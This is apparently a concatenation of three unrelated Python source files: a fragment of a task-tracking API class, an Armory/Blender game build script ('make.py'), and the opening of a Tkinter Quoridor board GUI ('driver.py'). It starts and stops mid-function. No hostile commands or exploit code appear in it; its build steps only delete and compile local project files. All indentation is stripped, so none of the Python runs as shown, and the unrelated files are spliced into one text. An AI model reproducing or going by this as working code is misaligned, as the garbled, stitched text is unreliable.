if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
# noinspection PyBroadException
try:
self.data.script.requirements = requirements
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
self.data.script = script
self._edit(script=script)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New name for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new task's ID.
"""
session = session if session else cls._get_default_session()
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
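# Illustrative usage sketch (hypothetical IDs and override values): clone an existing task
# while overriding one execution parameter; the new task's ID is returned.
#
#   new_id = Task._clone_task(
#       cloned_task_id='abc123', name='clone with larger batch',
#       execution_overrides={'parameters': {'batch_size': '64'}},
#   )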
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: bash
status='completed', search_text='specific_word', user='user_id', project='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
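# Illustrative usage sketch (hypothetical filter values): list tasks of one project and
# read the task objects off the API response, as get_by_name below does.
#
#   res = Task.get_all(status=['completed'], project=['project_id'])
#   task_ids = [t.id for t in res.response.tasks]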
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
def _get_all_events(self, max_events=100):
# type: (int) -> Any
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:return: A list of events from the task.
"""
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
))
events_list = log_events.response.events
total_events = log_events.response.total
scroll = log_events.response.scroll_id
while len(events_list) < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
scroll_id=scroll,
))
events_list.extend(log_events.response.events)
scroll = log_events.response.scroll_id
return events_list
@property
def _edit_lock(self):
# type: () -> ()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
# remove previous file lock instance, just in case.
filename = os.path.join(gettempdir(), 'trains_{}.lock'.format(self.id))
# noinspection PyBroadException
try:
os.unlink(filename)
except Exception:
pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Union[str, Task]) -> ()
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[1]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
code_parsed = False
profile_time = 0
def compile_shader_pass(res, raw_shaders_path, shader_name, defs):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path, is_play=False, is_publish=False, in_viewport=False):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_shaders == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
# Detect camera plane changes
if len(bpy.data.cameras) > 0:
cam = bpy.data.cameras[0]
if state.last_clip_start == 0:
state.last_clip_start = cam.clip_start
state.last_clip_end = cam.clip_end
elif cam.clip_start != state.last_clip_start or cam.clip_end != state.last_clip_end:
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
state.last_clip_start = cam.clip_start
state.last_clip_end = cam.clip_end
raw_shaders_path = sdk_path + 'armory/Shaders/'
assets_path = sdk_path + 'armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = is_publish and wrd.arm_asset_compression
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.zip' if (scene.arm_compress and is_publish) else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
print('Shader flags: ' + str(defs))
# Write compiled.glsl
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs)
# elif ref.startswith('grease_pencil'):
# compile_shader_pass(res, raw_shaders_path, ref, [])
else:
compile_shader_pass(res, raw_shaders_path, ref, defs)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write khafile.js
enable_dce = is_publish and wrd.arm_dce
import_logic = not is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(is_play, export_physics, export_navigation, export_ui, is_publish, enable_dce, in_viewport, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
# Import all logic nodes for patching if logic is being edited
if wrd.arm_write_config:
write_data.write_config(resx, resy)
write_data.write_main(scene_name, resx, resy, is_play, in_viewport, is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(target_name=None, watch=False, patch=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
if target_name == None:
target_name = state.target
if target_name == 'native':
target_name = ''
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
kha_target_name = arm.utils.get_kha_target(target_name)
cmd = [node_path, khamake_path, kha_target_name]
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() and not state.in_viewport:
cmd.append('--shaderversion')
cmd.append('110')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
cmd.append('--to')
if (kha_target_name == 'krom' and not state.in_viewport and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
else:
cmd.append(arm.utils.build_dir())
# User defined commands
if wrd.arm_khamake != '':
for s in bpy.data.texts[wrd.arm_khamake].as_string().split(' '):
cmd.append(s)
if patch:
if state.compileproc == None:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
state.compileproc = subprocess.Popen(cmd, stderr=subprocess.PIPE)
if state.playproc == None:
mode = 'play_viewport' if state.in_viewport else 'play'
else:
mode = 'build'
threading.Timer(0.1, watch_patch, [mode]).start()
return state.compileproc
elif watch:
print("Running: ", cmd)
state.compileproc = subprocess.Popen(cmd)
mode = 'publish' if state.is_publish else 'build'
threading.Timer(0.1, watch_compile, [mode]).start()
return state.compileproc
else:
print("Running: ", cmd)
return subprocess.Popen(cmd)
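# For reference, a hedged sketch of the kind of khamake command the code above assembles
# (node/khamake paths and the build directory depend on the local SDK install, so the
# values below are illustrative only, not the exact output):
#
#   node <khamake_path> krom -g opengl --shaderversion 330 --to <build_dir>/debug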
def build_viewport():
if state.compileproc != None:
return
if not arm.utils.check_saved(None):
return
if not arm.utils.check_sdkpath(None):
return
if not arm.utils.check_engine(None):
return
arm.utils.check_default_rp()
state.is_export = False
assets.invalidate_enabled = False
play(in_viewport=True)
assets.invalidate_enabled = True
def build(is_play=False, is_publish=False, in_viewport=False):
global profile_time
profile_time = time.time()
state.is_publish = is_publish
state.in_viewport = in_viewport
# Save blend
if arm.utils.get_save_on_build() and not state.in_viewport:
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path, is_play=is_play, is_publish=is_publish, in_viewport=in_viewport)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def stop_project():
if state.playproc != None:
state.playproc.terminate()
state.playproc = None
def watch_play():
if state.playproc == None:
return
line = b''
while state.playproc != None and state.playproc.poll() == None:
char = state.playproc.stderr.read(1) # Read immediately one by one
if char == b'\n':
msg = str(line).split('"', 1) # Extract message
if len(msg) > 1:
trace = msg[1].rsplit('"', 1)[0]
log.krom_trace(trace)
line = b''
else:
line += char
state.playproc = None
log.clear()
def watch_compile(mode):
state.compileproc.wait()
print('Finished in ' + str(time.time() - profile_time))
if state.compileproc == None:
return
result = state.compileproc.poll()
state.compileproc = None
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
on_compiled(mode)
else:
log.print_info('Build failed, check console')
def watch_patch(mode):
state.compileproc.wait()
state.compileproc = None
on_compiled(mode)
def runtime_to_target(in_viewport):
wrd = bpy.data.worlds['Arm']
if in_viewport or wrd.arm_play_runtime == 'Krom':
return 'krom'
elif wrd.arm_play_runtime == 'Native':
return 'native'
else:
return 'html5'
def get_khajs_path(in_viewport, target):
if in_viewport:
return arm.utils.build_dir() + '/krom/krom.js'
elif target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play(in_viewport):
global scripts_mtime
global code_parsed
wrd = bpy.data.worlds['Arm']
log.clear()
state.target = runtime_to_target(in_viewport)
# Build data
build(is_play=True, in_viewport=in_viewport)
khajs_path = get_khajs_path(in_viewport, state.target)
if not wrd.arm_cache_compiler or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target or \
state.last_in_viewport != state.in_viewport or \
state.target == 'native':
wrd.arm_recompile = True
state.last_target = state.target
state.last_in_viewport = state.in_viewport
if state.in_viewport:
if arm.utils.get_rp().rp_gi != 'Off' and bpy.app.version < (2, 80, 1):
log.warn('Use Blender 2.8 to run Voxel GI in viewport')
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
# New compile required - traits changed
if wrd.arm_recompile:
mode = 'play'
if state.target == 'native':
state.compileproc = compile(target_name='--run')
elif state.target == 'krom':
if in_viewport:
mode = 'play_viewport'
state.compileproc = compile(target_name='krom')
else: # Browser
state.compileproc = compile(target_name='html5')
threading.Timer(0.1, watch_compile, [mode]).start()
else: # kha.js up to date
compile(patch=True)
def on_compiled(mode): # build, play, play_viewport, publish
log.clear()
wrd = bpy.data.worlds['Arm']
if mode == 'play_viewport':
open(arm.utils.get_fp_build() + '/krom/krom.lock', 'w').close()
elif mode == 'play':
if wrd.arm_play_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_play_runtime == 'Krom':
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
args = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'mac': # TODO: Krom sound freezes on MacOS
args.append('--nosound')
args.append('--stdout')
args.append(arm.utils.get_fp_build() + '/krom.txt')
state.playproc = subprocess.Popen(args, stderr=subprocess.PIPE)
watch_play()
elif mode == 'publish':
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Clean up
mapfile = files_path + '/krom.js.temp.map'
if os.path.exists(mapfile):
os.remove(mapfile)
# Copy Krom binaries
if state.target == 'krom-windows':
krom_location = sdk_path + '/Krom/win32/'
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/linux/'
else:
krom_location = sdk_path + '/Krom/macos/Krom.app'
if state.target == 'krom-macos':
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
else:
krom_files = os.listdir(krom_location)
for f in krom_files:
f = krom_location + '/' + f
if os.path.isfile(f):
shutil.copy(f, files_path)
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'opengl' else '_' + gapi
bin_path = files_path + '/Krom' + ext + '.exe'
os.rename(bin_path, files_path + '/' + arm.utils.safestr(wrd.arm_project_name) + '.exe')
if gapi != 'opengl' and os.path.exists(files_path + '/Krom.exe'):
os.remove(files_path + '/Krom.exe')
if gapi != 'direct3d11' and os.path.exists(files_path + '/Krom_direct3d11.exe'):
os.remove(files_path + '/Krom_direct3d11.exe')
elif state.target == 'krom-linux':
os.rename(files_path + '/Krom', files_path + '/' + arm.utils.safestr(wrd.arm_project_name))
else:
os.rename(files_path + '/Krom.app', files_path + '/' + arm.utils.safestr(wrd.arm_project_name) + '.app')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name == 'ios' or target_name == 'osx': # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name == 'windows' or target_name == 'windowsapp':
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name == 'android-native':
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name == 'krom':
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.is_cached = False
print('Project cleaned')
|
driver.py
|
from tkinter import *
from math import floor
from quoridor import *
from features import simple_policy, simple_value
from threading import Thread
from sys import argv
from ai import monte_carlo_tree_search
from copy import deepcopy
class TkBoard(object):
# CONSTANTS
SQUARE_SIZE = 50
GOAL_SQUARE_SIZE = 8
PLAYER_SIZE = SQUARE_SIZE * 0.8
SQUARE_SPACING = 10
MARGIN = 20
PANEL_WIDTH = 200
ICON_MARGIN = 55
BUTTON_Y_START = 125
BUTTON_WIDTH = 100
BUTTON_HEIGHT = 30
BUTTON_MARGIN = 10
LABEL_Y_START = 330
LABEL_FONT_SIZE = 26
LABEL_SPACING = 10
def LABEL_TEXT(s, n, c):
return ("%-" + str(n + 7) + "s") % ("walls: " + "I" * c)
DEFAULT_COLORS = {'bg': '#FFFFFF',
'square': '#333333',
'wall': '#DD6611',
'wall-error': '#CC1111',
'panel': '#333333',
'button': '#555555',
'text': '#000000',
'players': ['#11CC11', '#CC11CC', '#CC1111', '#11CCCC']
}
# CLASS VARIABLES - DRAWING
tk_root = None
tk_canv = None
players = []
player_ghost = None
icon = None
ai_label = None
squares = [[0] * 9 for _ in range(9)] # independent rows; [[0] * 9] * 9 would make every row alias the same list
goal_squares = []
wall_labels = []
flow_lines = []
grid = None
canvas_dims = (0, 0)
buttons = [] # will contain bbox and callback as tuple for each button
walls = {} # will be dictionary of name => id. all will exist, transparency toggled, colors changed for errors
active_wall = ""
active_move = ""
recent_x = 0
recent_y = 0
disp_flow = False
save_file = None
ai_depth = 6
ai_n_playout = 5000
# GAME-INTERACTION VARIABLES
moveType = "move"
game_over = False
# CONTROL VARIABLES
THREAD_SLEEP = 0.1
def set_default_colors(self, new_colors_dict=None):
"""update default colors with given dictionary of new color scheme
Given colors don't need to be complete - only updates those given"""
# avoid a mutable default argument; None means "no overrides"
for k, v in (new_colors_dict or {}).items():
if k in self.DEFAULT_COLORS:
self.DEFAULT_COLORS[k] = v
def new_game(self, ai=0, load_file=None, save_file=None, **kwargs):
"""Destroy old board, draw new board, update object state with new board
"""
if self.tk_root:
self.tk_root.destroy()
self.tk_root = Tk()
self.tk_root.bind("<Escape>", lambda e: self.handle_quit())
self.tk_root.bind("<Motion>", lambda e: self.handle_mouse_motion(e.x, e.y))
self.tk_root.bind("<Button-1>", lambda e: self.handle_click(e))
self.tk_root.bind("<Left>", lambda e: self.handle_keypress("L"))
self.tk_root.bind("<Right>", lambda e: self.handle_keypress("R"))
self.tk_root.bind("<Up>", lambda e: self.handle_keypress("U"))
self.tk_root.bind("<Down>", lambda e: self.handle_keypress("D"))
self.tk_root.bind("w", lambda e: self.set_movetype("wall"))
self.tk_root.bind("m", lambda e: self.set_movetype("move"))
self.tk_root.bind("<space>", lambda e: self.toggle_movetype())
self.tk_root.bind("u", lambda e: self.undo())
self.tk_root.bind("r", lambda e: self.redo())
self.tk_root.bind("<Enter>", lambda e: self.refresh())
self.tk_root.bind("t", lambda e: self.disp_time_stats())
self.tk_root.bind("f", lambda e: self.toggle_flow())
self.thread_kill = False
self.time_stats = []
# margin - space/2 - square - space - square - ... - square - space/2 - margin - panel
total_height = 9 * self.SQUARE_SIZE + 9 * self.SQUARE_SPACING + 2 * self.MARGIN
total_width = total_height + self.PANEL_WIDTH
self.canvas_dims = (total_width, total_height)
self.tk_canv = Canvas(self.tk_root, width=total_width, height=total_height,
background=self.DEFAULT_COLORS['bg'])
self.tk_canv.pack()
self.draw_squares()
self.generate_walls()
self.game = Quoridor()
self.save_file = save_file
if load_file is not None:
self.game = Quoridor.load(load_file, undo_all=True)
self.players = [(None, None)] * len(self.game.players)
self.max_walls = self.game.players[0][1]
self.wall_labels = [None] * len(self.game.players)
self.draw_panel()
self.ai_threads = [None] * ai
self.ai_players = range(ai)
self.ai_running = False
self.ai_depth = kwargs.get('ai_depth', self.ai_depth)
self.ai_n_playout = kwargs.get('ai_n_playout', self.ai_n_playout)
self.draw_squares()
self.draw_goals()
self.generate_walls()
self.refresh()
if ai > 0:
self.start_ai(0)
self.tk_root.focus_force()
self.tk_root.mainloop()
def handle_quit(self):
if self.save_file is not None:
self.game.save(self.save_file)
self.tk_root.destroy()
def refresh(self):
self.clear_ghost()
self.handle_mouse_motion(self.recent_x, self.recent_y)
self.active_wall = ""
self.active_move = ""
self.draw_players()
self.draw_current_player_icon()
self.draw_wall_counts()
self.draw_flow()
self.redraw_walls(False)
def draw_current_player_icon(self):
width, height = self.canvas_dims
midx = width - self.PANEL_WIDTH / 2
radius = self.PLAYER_SIZE / 2
x0, x1 = midx - radius, midx + radius
y0, y1 = self.ICON_MARGIN - radius, self.ICON_MARGIN + radius
c = self.DEFAULT_COLORS['players'][self.game.current_player]
oval = self.tk_canv.create_oval(x0, y0, x1, y1, fill=c, outline="")
if self.icon:
self.tk_canv.delete(self.icon)
self.icon = oval
def draw_flow(self):
for line in self.flow_lines:
self.tk_canv.delete(line)
if self.disp_flow:
graph = self.game._pathgraphs[self.game.current_player]
for (cur, next) in graph._downhill.items():
if next is not None:
(x0, y0) = self.grid_to_point(cur)
(x1, y1) = self.grid_to_point(next)
self.flow_lines.append(self.tk_canv.create_line(x0, y0, x1, y1, fill='green'))
def new_rect_button(self, text, fill, x0, y0, x1, y1, callback):
hover_lighten = TkBoard.alpha_hax(fill, "#FFFFFF", 0.25)
